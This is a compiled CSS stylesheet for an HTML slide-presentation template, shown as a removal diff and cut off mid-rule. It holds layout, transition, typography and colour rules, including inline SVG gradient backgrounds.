#fff; - -webkit-font-smoothing: antialiased; - -moz-font-smoothing: antialiased; - -ms-font-smoothing: antialiased; - -o-font-smoothing: antialiased; - -moz-transition: opacity 800ms ease-in 100ms; - -o-transition: opacity 800ms ease-in 100ms; - -webkit-transition: opacity 800ms ease-in; - -webkit-transition-delay: 100ms; - transition: opacity 800ms ease-in 100ms; - /*font-size: 2.2vmin;*/ -} -/* line 73, ../scss/_base.scss */ -body.loaded { - opacity: 1 !important; -} - -/* line 78, ../scss/_base.scss */ -input, button { - vertical-align: middle; -} - -/* line 82, ../scss/_base.scss */ -slides > slide[hidden] { - display: none !important; -} - -/* line 86, ../scss/_base.scss */ -slides { - width: 100vw; - height: 56.25vw; - max-height: 100vh; - max-width: 177.78vh; - bottom: auto; - right: auto; - transform: translate(-50%, -50%); - position: absolute; - left: 0; - top: 0; - right: 0; - bottom: 0; - margin: auto; - -moz-transform: translate3d(0, 0, 0); - -ms-transform: translate3d(0, 0, 0); - -webkit-transform: translate3d(0, 0, 0); - transform: translate3d(0, 0, 0); - -moz-perspective: 1000; - -webkit-perspective: 1000; - perspective: 1000; - -moz-transform-style: preserve-3d; - -webkit-transform-style: preserve-3d; - transform-style: preserve-3d; - -moz-transition: opacity 800ms ease-in 100ms; - -o-transition: opacity 800ms ease-in 100ms; - -webkit-transition: opacity 800ms ease-in; - -webkit-transition-delay: 100ms; - transition: opacity 800ms ease-in 100ms; - font-size: 14px; -} - -/* line 98, ../scss/_base.scss */ -slides > slide { - display: block; - position: absolute; - overflow: hidden; - -moz-box-sizing: border-box; - -webkit-box-sizing: border-box; - box-sizing: border-box; -} - -/* Slide styles */ -/*article.fill iframe { - position: absolute; - left: 0; - top: 0; - width: 100%; - height: 100%; - - border: 0; - margin: 0; - - @include border-radius(10px); - - z-index: -1; -} - -slide.fill { - background-repeat: no-repeat; - @include background-size(cover); -} - -slide.fill img { - position: absolute; - left: 0; - top: 0; - min-width: 100%; - min-height: 100%; - - z-index: -1; -} -*/ -/** - * Theme Styles - */ -/* line 22, ../scss/default.scss */ -::selection { - color: white; - background-color: #ffd14d; - text-shadow: none; -} - -/* line 28, ../scss/default.scss */ -::-webkit-scrollbar { - height: 16px; - overflow: visible; - width: 16px; -} - -/* line 33, ../scss/default.scss */ -::-webkit-scrollbar-thumb { - background-color: rgba(0, 0, 0, 0.1); - background-clip: padding-box; - border: solid transparent; - min-height: 28px; - padding: 100px 0 0; - -moz-box-shadow: inset 1px 1px 0 rgba(0, 0, 0, 0.1), inset 0 -1px 0 rgba(0, 0, 0, 0.07); - -webkit-box-shadow: inset 1px 1px 0 rgba(0, 0, 0, 0.1), inset 0 -1px 0 rgba(0, 0, 0, 0.07); - box-shadow: inset 1px 1px 0 rgba(0, 0, 0, 0.1), inset 0 -1px 0 rgba(0, 0, 0, 0.07); - border-width: 1px 1px 1px 6px; -} - -/* line 42, ../scss/default.scss */ -::-webkit-scrollbar-thumb:hover { - background-color: rgba(0, 0, 0, 0.5); -} - -/* line 45, ../scss/default.scss */ -::-webkit-scrollbar-button { - height: 0; - width: 0; -} - -/* line 49, ../scss/default.scss */ -::-webkit-scrollbar-track { - background-clip: padding-box; - border: solid transparent; - border-width: 0 0 0 4px; -} - -/* line 54, ../scss/default.scss */ -::-webkit-scrollbar-corner { - background: transparent; -} - -/* line 58, ../scss/default.scss */ -body { - background: black; -} - -/* line 62, ../scss/default.scss */ -slides > slide { - display: none; - font-family: 'Lato', sans-serif; - font-size: 2em; - color: #797979; - padding: 5%; - -moz-transition: all 0.6s ease-in-out; - -o-transition: all 0.6s ease-in-out; - /*-webkit-transition: all 0.6s ease-in-out; - transition: all 0.6s ease-in-out;*/ - /*overflow: auto;*/ -} -/* line 83, ../scss/default.scss */ -slides > slide.far-past { - display: none; -} -/* line 90, ../scss/default.scss */ -slides > slide.past { - display: block; - opacity: 0; -} -/* line 97, ../scss/default.scss */ -slides > slide.current { - display: block; - opacity: 1; -} -/* line 103, ../scss/default.scss */ -slides > slide.current .auto-fadein { - opacity: 1; -} -/* line 107, ../scss/default.scss */ -slides > slide.current .gdbar { - -moz-background-size: 100% 100%; - -o-background-size: 100% 100%; - -webkit-background-size: 100% 100%; - background-size: 100% 100%; -} -/* line 112, ../scss/default.scss */ -slides > slide.next { - /*display: block;*/ - display: none; - opacity: 0; - pointer-events: none; -} -/* line 120, ../scss/default.scss */ -slides > slide.far-next { - display: none; -} -/* line 127, ../scss/default.scss */ -slides > slide.dark { - background: #515151 !important; -} -/* line 135, ../scss/default.scss */ -slides > slide:not(.nobackground):before { - font-size: 1em; - content: ""; - position: absolute; - bottom: 20px; - left: 60px; - -moz-background-size: 30px 30px; - -o-background-size: 30px 30px; - -webkit-background-size: 30px 30px; - background-size: 30px 30px; - padding-left: 40px; - height: 30px; - line-height: 1.9; -} -/* line 147, ../scss/default.scss */ -slides > slide:not(.nobackground):after { - font-size: 0.5em; - content: attr(data-slide-num) "/" attr(data-total-slides); - position: fixed; - bottom: 20px; - right: 20px; - line-height: 1.9; -} -/* line 158, ../scss/default.scss */ -slides > slide.title-slide:after { - content: ''; - position: absolute; - bottom: 40px; - right: 40px; - width: 100%; - height: 60px; -} -/* line 170, ../scss/default.scss */ -slides > slide.backdrop { - z-index: -10; - display: block !important; - background: url('data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz4gPHN2ZyB2ZXJzaW9uPSIxLjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyI+PGRlZnM+PGxpbmVhckdyYWRpZW50IGlkPSJncmFkIiBncmFkaWVudFVuaXRzPSJvYmplY3RCb3VuZGluZ0JveCIgeDE9IjAuNSIgeTE9IjAuMCIgeDI9IjAuNSIgeTI9IjEuMCI+PHN0b3Agb2Zmc2V0PSIwJSIgc3RvcC1jb2xvcj0iI2ZmZmZmZiIvPjxzdG9wIG9mZnNldD0iODUlIiBzdG9wLWNvbG9yPSIjZmZmZmZmIi8+PHN0b3Agb2Zmc2V0PSIxMDAlIiBzdG9wLWNvbG9yPSIjZTZlNmU2Ii8+PC9saW5lYXJHcmFkaWVudD48L2RlZnM+PHJlY3QgeD0iMCIgeT0iMCIgd2lkdGg9IjEwMCUiIGhlaWdodD0iMTAwJSIgZmlsbD0idXJsKCNncmFkKSIgLz48L3N2Zz4g'); - background: -webkit-gradient(linear, 50% 0%, 50% 100%, color-stop(0%, #ffffff), color-stop(85%, #ffffff), color-stop(100%, #e6e6e6)); - background: -moz-linear-gradient(#ffffff, #ffffff 85%, #e6e6e6); - background: -webkit-linear-gradient(#ffffff, #ffffff 85%, #e6e6e6); - background: linear-gradient(#ffffff, #ffffff 85%, #e6e6e6); - background-color: white; -} -/* line 175, ../scss/default.scss */ -slides > slide.backdrop:after, slides > slide.backdrop:before { - display: none; -} -/* line 180, ../scss/default.scss */ -/*slides > slide > hgroup + article { - margin-top: 45px; -}*/ -/* line 184, ../scss/default.scss */ -slides > slide > hgroup + article.flexbox.vcenter, slides > slide > hgroup + article.flexbox.vleft, slides > slide > hgroup + article.flexbox.vright { - height: 80%; -} -/* line 189, ../scss/default.scss */ -slides > slide > hgroup + article p { - margin-bottom: 0.5em; - line-height: initial; -} -/* line 194, ../scss/default.scss */ -slides > slide > article:only-child { - height: 100%; -} -/* line 197, ../scss/default.scss */ -slides > slide > article:only-child > iframe { - height: 98%; -} - -/* line 203, ../scss/default.scss */ -slides.layout-faux-widescreen > slide { - padding: 40px 160px; -} - -/* line 212, ../scss/default.scss */ -slides.layout-widescreen > slide, -slides.layout-faux-widescreen > slide { - width: 100%; - /*overflow: auto;*/ -} -/* line 217, ../scss/default.scss */ -slides.layout-widescreen > slide.far-past, -slides.layout-faux-widescreen > slide.far-past { - display: block; - display: none; - -moz-transform: translate(-2260px); - -ms-transform: translate(-2260px); - -webkit-transform: translate(-2260px); - transform: translate(-2260px); - -moz-transform: translate3d(-2260px, 0, 0); - -ms-transform: translate3d(-2260px, 0, 0); - -webkit-transform: translate3d(-2260px, 0, 0); - transform: translate3d(-2260px, 0, 0); -} -/* line 224, ../scss/default.scss */ -slides.layout-widescreen > slide.past, -slides.layout-faux-widescreen > slide.past { - display: block; - opacity: 0; -} -/* line 231, ../scss/default.scss */ -slides.layout-widescreen > slide.current, -slides.layout-faux-widescreen > slide.current { - display: block; - opacity: 1; -} -/* line 238, ../scss/default.scss */ -slides.layout-widescreen > slide.next, -slides.layout-faux-widescreen > slide.next { - /*display: block;*/ - opacity: 0; - pointer-events: none; -} -/* line 246, ../scss/default.scss */ -slides.layout-widescreen > slide.far-next, -slides.layout-faux-widescreen > slide.far-next { - display: block; - display: none; - -moz-transform: translate(2260px); - -ms-transform: translate(2260px); - -webkit-transform: translate(2260px); - transform: translate(2260px); - -moz-transform: translate3d(2260px, 0, 0); - -ms-transform: translate3d(2260px, 0, 0); - -webkit-transform: translate3d(2260px, 0, 0); - transform: translate3d(2260px, 0, 0); -} -/* line 253, ../scss/default.scss */ -slides.layout-widescreen #prev-slide-area, -slides.layout-faux-widescreen #prev-slide-area { - margin-left: -650px; -} -/* line 257, ../scss/default.scss */ -slides.layout-widescreen #next-slide-area, -slides.layout-faux-widescreen #next-slide-area { - margin-left: 550px; -} - -/* line 262, ../scss/default.scss */ -b { - font-weight: 600; -} - -/* line 266, ../scss/default.scss */ -a { - color: #5c31ff;; - text-decoration: none; - border-bottom: 1px solid rgba(42, 124, 223, 0.5); -} -/* line 271, ../scss/default.scss */ -a:hover { - color: black !important; -} - -/* line 276, ../scss/default.scss */ -h1, h2, h3 { - font-weight: 600; - color: #5c31ff; -} - -h1, h2 { - font-size: 1.5em; - font-family: 'Work Sans', sans-serif; -} -/* line 280, ../scss/default.scss */ -/*h2 { - font-size: 2em; - line-height: 45px; - letter-spacing: -2px; - color: #515151; -}*/ - -/* line 287, ../scss/default.scss */ -h3 { - font-size: 1.6em; - letter-spacing: -1px; - line-height: 2; - font-weight: inherit; - color: #797979; -} - -/* line 295, ../scss/default.scss */ -ul { - margin-left: 2.2em; - margin-bottom: 1em; - position: relative; - width: 90%; -} -/* line 300, ../scss/default.scss */ -ul li { - margin-bottom: 0.5em; - color: black; - line-height: 1.4em; -} -/* line 303, ../scss/default.scss */ -ul li ul { - margin-left: 2em; - margin-bottom: 0; -} -/* line 307, ../scss/default.scss */ -/*ul li ul li:before { - content: '-'; - font-weight: 600; -}*/ -/* line 314, ../scss/default.scss */ -/*ul > li:before { - content: '\00B7'; - margin-left: -0.5em; - position: absolute; - font-weight: 600; - font-size: 2em; -}*/ -/* line 321, ../scss/default.scss */ -/*ul ul { - margin-top: .5em; -}*/ - -/* line 328, ../scss/default.scss */ -.highlight-code slide.current pre > * { - opacity: 0.25; - -moz-transition: opacity 0.5s ease-in; - -o-transition: opacity 0.5s ease-in; - -webkit-transition: opacity 0.5s ease-in; - transition: opacity 0.5s ease-in; -} -/* line 332, ../scss/default.scss */ -.highlight-code slide.current b { - opacity: 1; -} - -/* line 337, ../scss/default.scss */ -pre { - font-family: 'consolas', 'Courier New', monospace; - font-size: 0.8em; - line-height: 1.2em; - /*padding: 0.8em;*/ - margin-bottom: 0.5em; - /*background-color: #e6e6e6;*/ - -moz-box-sizing: border-box; - -webkit-box-sizing: border-box; - box-sizing: border-box; - overflow: auto; - white-space: pre-wrap; -} - -/* line 351, ../scss/default.scss */ -pre[data-lang]:after { - content: attr(data-lang); - /*background-color: #a9a9a9;*/ - right: 0; - top: 0; - position: absolute; - font-size: 1em; - color: white; - padding: 2px 25px; - text-transform: uppercase; -} - -/* line 364, ../scss/default.scss */ -pre[data-lang="go"] { - color: #333; -} - -/* line 368, ../scss/default.scss */ -code { - font-size: 95%; - font-family: 'Consolas', 'Courier New', monospace; - color: black; -} - -/* line 374, ../scss/default.scss */ -iframe { - width: 100%; - height: 530px; - background: white; - border: 1px solid #e6e6e6; - -moz-box-sizing: border-box; - -webkit-box-sizing: border-box; - box-sizing: border-box; -} - -/* line 382, ../scss/default.scss */ -dt { - font-weight: bold; -} - -/* line 386, ../scss/default.scss */ -button { - display: inline-block; - padding: 5px 8px; - outline: none; - white-space: nowrap; - -moz-user-select: -moz-none; - -ms-user-select: none; - -webkit-user-select: none; - user-select: none; - cursor: pointer; - text-shadow: 1px 1px #fff; -} - -/* line 400, ../scss/default.scss */ -button:not(:disabled):hover { - border-color: #515151; -} - -/* line 404, ../scss/default.scss */ -button:not(:disabled):active { - background: url('data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz4gPHN2ZyB2ZXJzaW9uPSIxLjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyI+PGRlZnM+PGxpbmVhckdyYWRpZW50IGlkPSJncmFkIiBncmFkaWVudFVuaXRzPSJvYmplY3RCb3VuZGluZ0JveCIgeDE9IjAuNSIgeTE9IjAuMCIgeDI9IjAuNSIgeTI9IjEuMCI+PHN0b3Agb2Zmc2V0PSI0MCUiIHN0b3AtY29sb3I9IiNlM2UzZTMiLz48c3RvcCBvZmZzZXQ9IjcwJSIgc3RvcC1jb2xvcj0iI2Y5ZjlmOSIvPjwvbGluZWFyR3JhZGllbnQ+PC9kZWZzPjxyZWN0IHg9IjAiIHk9IjAiIHdpZHRoPSIxMDAlIiBoZWlnaHQ9IjEwMCUiIGZpbGw9InVybCgjZ3JhZCkiIC8+PC9zdmc+IA=='); - background: -webkit-gradient(linear, 50% 0%, 50% 100%, color-stop(40%, #e3e3e3), color-stop(70%, #f9f9f9)); - background: -moz-linear-gradient(#e3e3e3 40%, #f9f9f9 70%); - background: -webkit-linear-gradient(#e3e3e3 40%, #f9f9f9 70%); - background: linear-gradient(#e3e3e3 40%, #f9f9f9 70%); -} - -/* line 408, ../scss/default.scss */ -:disabled { - color: #a9a9a9; -} - -/* line 412, ../scss/default.scss */ -.blue { - color: #4387fd; -} - -/* line 415, ../scss/default.scss */ -.blue2 { - color: #3c8ef3; -} - -/* line 418, ../scss/default.scss */ -.blue3 { - color: #2a7cdf; -} - -/* line 421, ../scss/default.scss */ -.yellow { - color: #ffd14d; -} - -/* line 424, ../scss/default.scss */ -.yellow2 { - color: #f9cc46; -} - -/* line 427, ../scss/default.scss */ -.yellow3 { - color: #f6c000; -} - -/* line 430, ../scss/default.scss */ -.green { - color: #0da861; -} - -/* line 433, ../scss/default.scss */ -.green2 { - color: #00a86d; -} - -/* line 436, ../scss/default.scss */ -.green3 { - color: #009f5d; -} - -/* line 439, ../scss/default.scss */ -.red { - color: #f44a3f; -} - -/* line 442, ../scss/default.scss */ -.red2 { - color: #e0543e; -} - -/* line 445, ../scss/default.scss */ -.red3 { - color: #d94d3a; -} - -/* line 448, ../scss/default.scss */ -.gray { - color: #e6e6e6; -} - -/* line 451, ../scss/default.scss */ -.gray2 { - color: #a9a9a9; -} - -/* line 454, ../scss/default.scss */ -.gray3 { - color: #797979; -} - -/* line 457, ../scss/default.scss */ -.gray4 { - color: #515151; -} - -/* line 461, ../scss/default.scss */ -.white { - color: white !important; -} - -/* line 464, ../scss/default.scss */ -.black { - color: black !important; -} - -/* line 468, ../scss/default.scss */ -.columns-2 { - -moz-column-count: 2; - -webkit-column-count: 2; - column-count: 2; -} - -/* line 472, ../scss/default.scss */ -table { - width: 100%; - border-collapse: -moz-initial; - border-collapse: initial; - border-spacing: 2px; - border-bottom: 1px solid #797979; -} -/* line 479, ../scss/default.scss */ -table tr > td:first-child, table th { - font-weight: 600; - color: #515151; -} -/* line 484, ../scss/default.scss */ -table tr:nth-child(odd) { - background-color: #e6e6e6; -} -/* line 488, ../scss/default.scss */ -table th { - color: white; - font-size: 1em; - background: grey; -} -/* line 494, ../scss/default.scss */ -table td, table th { - font-size: 1em; - padding: 1em 0.5em; -} -/* line 499, ../scss/default.scss */ -table td.highlight { - color: #515151; - background: grey; -} -/* line 504, ../scss/default.scss */ -table.rows { - border-bottom: none; - border-right: 1px solid #797979; -} -table td { - background: white; -} - -/* line 510, ../scss/default.scss */ -q { - font-size: 2em; - line-height: 72px; -} -/* line 514, ../scss/default.scss */ -q:before { - content: '“'; - position: absolute; - margin-left: -0.5em; -} -/* line 519, ../scss/default.scss */ -q:after { - content: 'â€'; - position: absolute; - margin-left: 0.1em; -} - -/* line 526, ../scss/default.scss */ -slide.fill { - background-repeat: no-repeat; - -moz-border-radius: 5px; - -webkit-border-radius: 5px; - border-radius: 5px; - -moz-background-size: cover; - -o-background-size: cover; - -webkit-background-size: cover; - background-size: cover; -} - -/* Size variants */ -/* line 535, ../scss/default.scss */ -article.smaller p, article.smaller ul { - font-size: 20px; - line-height: 24px; - letter-spacing: 0; -} -/* line 541, ../scss/default.scss */ -article.smaller table td, article.smaller table th { - font-size: 14px; -} -/* line 545, ../scss/default.scss */ -article.smaller pre { - font-size: 15px; - line-height: 20px; - letter-spacing: 0; -} -/* line 550, ../scss/default.scss */ -article.smaller q { - font-size: 40px; - line-height: 48px; -} -/* line 554, ../scss/default.scss */ -article.smaller q:before, article.smaller q:after { - font-size: 60px; -} - -/* Builds */ -/* line 563, ../scss/default.scss */ -.build > * { - -moz-transition: opacity 0.5s ease-in-out 0.2s; - -o-transition: opacity 0.5s ease-in-out 0.2s; - -webkit-transition: opacity 0.5s ease-in-out; - -webkit-transition-delay: 0.2s; - transition: opacity 0.5s ease-in-out 0.2s; -} -/* line 567, ../scss/default.scss */ -.build .to-build { - opacity: 0; -} -/* line 571, ../scss/default.scss */ -.build .build-fade { - opacity: 0.3; -} -/* line 574, ../scss/default.scss */ -.build .build-fade:hover { - opacity: 1.0; -} - -/* line 581, ../scss/default.scss */ -.popup .next .build .to-build { - opacity: 1; -} -/* line 585, ../scss/default.scss */ -.popup .next .build .build-fade { - opacity: 1; -} - -/* Pretty print */ -/* line 592, ../scss/default.scss */ -.prettyprint .str, -.prettyprint .atv { - /* a markup attribute value */ - color: #009f5d; -} - -/* line 596, ../scss/default.scss */ -.prettyprint .kwd, -.prettyprint .tag { - /* a markup tag name */ - color: #0066cc; -} - -/* line 600, ../scss/default.scss */ -.prettyprint .com { - /* a comment */ - color: #797979; - font-style: italic; -} - -/* line 604, ../scss/default.scss */ -.prettyprint .lit { - /* a literal value */ - color: #7f0000; -} - -/* line 607, ../scss/default.scss */ -.prettyprint .pun, -.prettyprint .opn, -.prettyprint .clo { - color: #515151; -} - -/* line 612, ../scss/default.scss */ -.prettyprint .typ, -.prettyprint .atn, -.prettyprint .dec, -.prettyprint .var { - /* a declaration; a variable name */ - color: #d94d3a; -} - -/* line 618, ../scss/default.scss */ -.prettyprint .pln { - color: #515151; -} - -/* line 622, ../scss/default.scss */ -.note { - position: fixed; - z-index: 100; - width: 100%; - height: 100%; - top: 0; - left: 0; - padding: 1em; - background: white; - line-height: 1.5em; - opacity: 0; - pointer-events: none; - display: -webkit-box !important; - display: -moz-box !important; - display: -ms-box !important; - display: -o-box !important; - display: box !important; - -webkit-box-orient: vertical; - -moz-box-orient: vertical; - -ms-box-orient: vertical; - box-orient: vertical; - -webkit-box-align: center; - -moz-box-align: center; - -ms-box-align: center; - box-align: center; - -webkit-box-pack: center; - -moz-box-pack: center; - -ms-box-pack: center; - box-pack: center; - -moz-border-radius: 5px; - -webkit-border-radius: 5px; - border-radius: 5px; - -moz-box-sizing: border-box; - -webkit-box-sizing: border-box; - box-sizing: border-box; - -moz-transform: translateY(350px); - -ms-transform: translateY(350px); - -webkit-transform: translateY(350px); - transform: translateY(350px); - -moz-transition: all 0.4s ease-in-out; - -o-transition: all 0.4s ease-in-out; - -webkit-transition: all 0.4s ease-in-out; - transition: all 0.4s ease-in-out; -} -/* line 640, ../scss/default.scss */ -.note > section { - background: #fff; - -moz-border-radius: 5px; - -webkit-border-radius: 5px; - border-radius: 5px; - -moz-box-shadow: 0 0 10px #797979; - -webkit-box-shadow: 0 0 10px #797979; - box-shadow: 0 0 10px #797979; - width: 60%; - padding: 2em; -} - -/* line 657, ../scss/default.scss */ -.with-notes.popup slides.layout-widescreen slide.next, -.with-notes.popup slides.layout-faux-widescreen slide.next { - -moz-transform: translate3d(690px, 80px, 0) scale(0.35); - -ms-transform: translate3d(690px, 80px, 0) scale(0.35); - -webkit-transform: translate3d(690px, 80px, 0) scale(0.35); - transform: translate3d(690px, 80px, 0) scale(0.35); -} -/* line 660, ../scss/default.scss */ -.with-notes.popup slides.layout-widescreen slide .note, -.with-notes.popup slides.layout-faux-widescreen slide .note { - -moz-transform: translate3d(300px, 800px, 0) scale(1.5); - -ms-transform: translate3d(300px, 800px, 0) scale(1.5); - -webkit-transform: translate3d(300px, 800px, 0) scale(1.5); - transform: translate3d(300px, 800px, 0) scale(1.5); -} -/* line 666, ../scss/default.scss */ -.with-notes.popup slide { - overflow: visible; - background: white; - -moz-transition: none; - -o-transition: none; - -webkit-transition: none; - transition: none; - pointer-events: none; - -moz-transform-origin: 0 0; - -ms-transform-origin: 0 0; - -webkit-transform-origin: 0 0; - transform-origin: 0 0; -} -/* line 673, ../scss/default.scss */ -.with-notes.popup slide:not(.backdrop) { - -moz-transform: scale(0.6) translate3d(0.5em, 0.5em, 0); - -ms-transform: scale(0.6) translate3d(0.5em, 0.5em, 0); - -webkit-transform: scale(0.6) translate3d(0.5em, 0.5em, 0); - transform: scale(0.6) translate3d(0.5em, 0.5em, 0); - -moz-box-shadow: 0 0 10px #797979; - -webkit-box-shadow: 0 0 10px #797979; - box-shadow: 0 0 10px #797979; -} -/* line 678, ../scss/default.scss */ -.with-notes.popup slide.backdrop { - background-image: url('data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz4gPHN2ZyB2ZXJzaW9uPSIxLjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyI+PGRlZnM+PHJhZGlhbEdyYWRpZW50IGlkPSJncmFkIiBncmFkaWVudFVuaXRzPSJ1c2VyU3BhY2VPblVzZSIgY3g9IjUwJSIgY3k9IjUwJSIgcj0iNjAwJSI+PHN0b3Agb2Zmc2V0PSIwJSIgc3RvcC1jb2xvcj0iI2IxZGZmZiIvPjxzdG9wIG9mZnNldD0iMTAwJSIgc3RvcC1jb2xvcj0iIzQzODdmZCIvPjwvcmFkaWFsR3JhZGllbnQ+PC9kZWZzPjxyZWN0IHg9IjAiIHk9IjAiIHdpZHRoPSIxMDAlIiBoZWlnaHQ9IjEwMCUiIGZpbGw9InVybCgjZ3JhZCkiIC8+PC9zdmc+IA=='); - background-size: 100%; - background-image: -moz-radial-gradient(50% 50%, #b1dfff 0%, #4387fd 600px); - background-image: -webkit-radial-gradient(50% 50%, #b1dfff 0%, #4387fd 600px); - background-image: radial-gradient(50% 50%, #b1dfff 0%, #4387fd 600px); -} - -/* the popup class is used to display the speaker notes when 'presenter' view - is enabled. This view is not currently optimal, so certain selectors have been commented-out, - with a view to improving the styles at a later date */ - - -/* line 684, ../scss/default.scss */ -/*.with-notes.popup slide.next { - -moz-transform: translate3d(570px, 80px, 0) scale(0.35); - -ms-transform: translate3d(570px, 80px, 0) scale(0.35); - -webkit-transform: translate3d(570px, 80px, 0) scale(0.35); - transform: translate3d(570px, 80px, 0) scale(0.35); - opacity: 1 !important; -}*/ -/* line 688, ../scss/default.scss */ -/*.with-notes.popup slide.next .note { - display: none !important; -}*/ -/* line 694, ../scss/default.scss */ -.with-notes.popup .note { - width: 109%; - height: 260px; - background: #e6e6e6; - padding: 0; - -moz-box-shadow: 0 0 10px #797979; - -webkit-box-shadow: 0 0 10px #797979; - box-shadow: 0 0 10px #797979; - -moz-transform: translate3d(250px, 800px, 0) scale(1.5); - -ms-transform: translate3d(250px, 800px, 0) scale(1.5); - -webkit-transform: translate3d(250px, 800px, 0) scale(1.5); - transform: translate3d(250px, 800px, 0) scale(1.5); - -moz-transition: opacity 400ms ease-in-out; - -o-transition: opacity 400ms ease-in-out; - -webkit-transition: opacity 400ms ease-in-out; - transition: opacity 400ms ease-in-out; -} -/* line 705, ../scss/default.scss */ -.with-notes.popup .note > section { - background: #fff; - -moz-border-radius: 5px; - -webkit-border-radius: 5px; - border-radius: 5px; - height: 100%; - width: 100%; - -moz-box-sizing: border-box; - -webkit-box-sizing: border-box; - box-sizing: border-box; - -moz-box-shadow: none; - -webkit-box-shadow: none; - box-shadow: none; - overflow: auto; - padding: 1em; -} -/* line 718, ../scss/default.scss */ -.with-notes .note { - opacity: 1; - -moz-transform: translateY(0); - -ms-transform: translateY(0); - -webkit-transform: translateY(0); - transform: translateY(0); - pointer-events: auto; -} - -/* line 725, ../scss/default.scss */ -.source { - font-size: 14px; - color: #a9a9a9; - position: absolute; - bottom: 70px; - left: 60px; -} - -/* line 733, ../scss/default.scss */ -.centered { - text-align: center; -} - -/* line 737, ../scss/default.scss */ -.reflect { - -webkit-box-reflect: below 3px -webkit-linear-gradient(rgba(255, 255, 255, 0) 85%, white 150%); - -moz-box-reflect: below 3px -moz-linear-gradient(rgba(255, 255, 255, 0) 85%, white 150%); - -o-box-reflect: below 3px -o-linear-gradient(rgba(255, 255, 255, 0) 85%, white 150%); - -ms-box-reflect: below 3px -ms-linear-gradient(rgba(255, 255, 255, 0) 85%, white 150%); - box-reflect: below 3px linear-gradient(rgba(255, 255, 255, 0) 85%, #ffffff 150%); -} - -/* line 745, ../scss/default.scss */ -.flexbox { - display: -webkit-box !important; - display: -moz-box !important; - display: -ms-box !important; - display: -o-box !important; - display: box !important; -} - -/* line 749, ../scss/default.scss */ -.flexbox.vcenter { - -webkit-box-orient: vertical; - -moz-box-orient: vertical; - -ms-box-orient: vertical; - box-orient: vertical; - -webkit-box-align: center; - -moz-box-align: center; - -ms-box-align: center; - box-align: center; - -webkit-box-pack: center; - -moz-box-pack: center; - -ms-box-pack: center; - box-pack: center; - height: 100%; - width: 100%; -} - -/* line 755, ../scss/default.scss */ -.flexbox.vleft { - -webkit-box-orient: vertical; - -moz-box-orient: vertical; - -ms-box-orient: vertical; - box-orient: vertical; - -webkit-box-align: left; - -moz-box-align: left; - -ms-box-align: left; - box-align: left; - -webkit-box-pack: center; - -moz-box-pack: center; - -ms-box-pack: center; - box-pack: center; - height: 100%; - width: 100%; -} - -/* line 761, ../scss/default.scss */ -.flexbox.vright { - -webkit-box-orient: vertical; - -moz-box-orient: vertical; - -ms-box-orient: vertical; - box-orient: vertical; - -webkit-box-align: end; - -moz-box-align: end; - -ms-box-align: end; - box-align: end; - -webkit-box-pack: center; - -moz-box-pack: center; - -ms-box-pack: center; - box-pack: center; - height: 100%; - width: 100%; -} - -/* line 767, ../scss/default.scss */ -.auto-fadein { - -moz-transition: opacity 0.6s ease-in 1s; - -o-transition: opacity 0.6s ease-in 1s; - -webkit-transition: opacity 0.6s ease-in; - -webkit-transition-delay: 1s; - transition: opacity 0.6s ease-in 1s; - opacity: 0; -} - -/* Clickable/tappable areas */ -/* line 773, ../scss/default.scss */ -/*.slide-area { - z-index: 1000; - position: absolute; - left: 0; - top: 0; - width: 100px; - height: 700px; - left: 50%; - top: 50%; - cursor: pointer; - margin-top: -350px; -}*/ - -/* line 790, ../scss/default.scss */ -#prev-slide-area { - margin-left: -550px; -} - -/* line 795, ../scss/default.scss */ -#next-slide-area { - margin-left: 450px; -} - -/* ===== SLIDE CONTENT ===== */ -/* line 803, ../scss/default.scss */ -.logoslide img { - width: 383px; - height: 92px; -} - -/* line 809, ../scss/default.scss */ -.segue { - padding: 5%; -} -/* line 812, ../scss/default.scss */ -.segue h2 { - color: #e6e6e6; - font-size: 60px; -} -/* line 816, ../scss/default.scss */ -.segue h3 { - color: #e6e6e6; - line-height: 2.8; -} -/* line 820, ../scss/default.scss */ -.segue hgroup { - display: block; -} - -/* line 826, ../scss/default.scss */ -.thank-you-slide { - background: #4387fd !important; - color: white; -} -/* line 830, ../scss/default.scss */ -.thank-you-slide h2 { - font-size: 60px; - color: inherit; -} -/* line 835, ../scss/default.scss */ -.thank-you-slide article > p { - margin-top: 2em; - font-size: 20pt; -} -/* line 840, ../scss/default.scss */ -.thank-you-slide > p { - position: absolute; - bottom: 80px; - font-size: 24pt; - line-height: 1.3; -} - -/* line 848, ../scss/default.scss */ -aside.gdbar { - height: 97px; - width: 215px; - position: absolute; - left: -1px; - top: 125px; - -moz-border-radius: 0 10px 10px 0; - -webkit-border-radius: 0; - border-radius: 0 10px 10px 0; - background: url('data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz4gPHN2ZyB2ZXJzaW9uPSIxLjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyI+PGRlZnM+PGxpbmVhckdyYWRpZW50IGlkPSJncmFkIiBncmFkaWVudFVuaXRzPSJvYmplY3RCb3VuZGluZ0JveCIgeDE9IjAuMCIgeTE9IjAuNSIgeDI9IjEuMCIgeTI9IjAuNSI+PHN0b3Agb2Zmc2V0PSIwJSIgc3RvcC1jb2xvcj0iI2U2ZTZlNiIvPjxzdG9wIG9mZnNldD0iMTAwJSIgc3RvcC1jb2xvcj0iI2U2ZTZlNiIvPjwvbGluZWFyR3JhZGllbnQ+PC9kZWZzPjxyZWN0IHg9IjAiIHk9IjAiIHdpZHRoPSIxMDAlIiBoZWlnaHQ9IjEwMCUiIGZpbGw9InVybCgjZ3JhZCkiIC8+PC9zdmc+IA==') no-repeat; - background: -webkit-gradient(linear, 0% 50%, 100% 50%, color-stop(0%, #e6e6e6), color-stop(100%, #e6e6e6)) no-repeat; - background: -moz-linear-gradient(left, #e6e6e6, #e6e6e6) no-repeat; - background: -webkit-linear-gradient(left, #e6e6e6, #e6e6e6) no-repeat; - 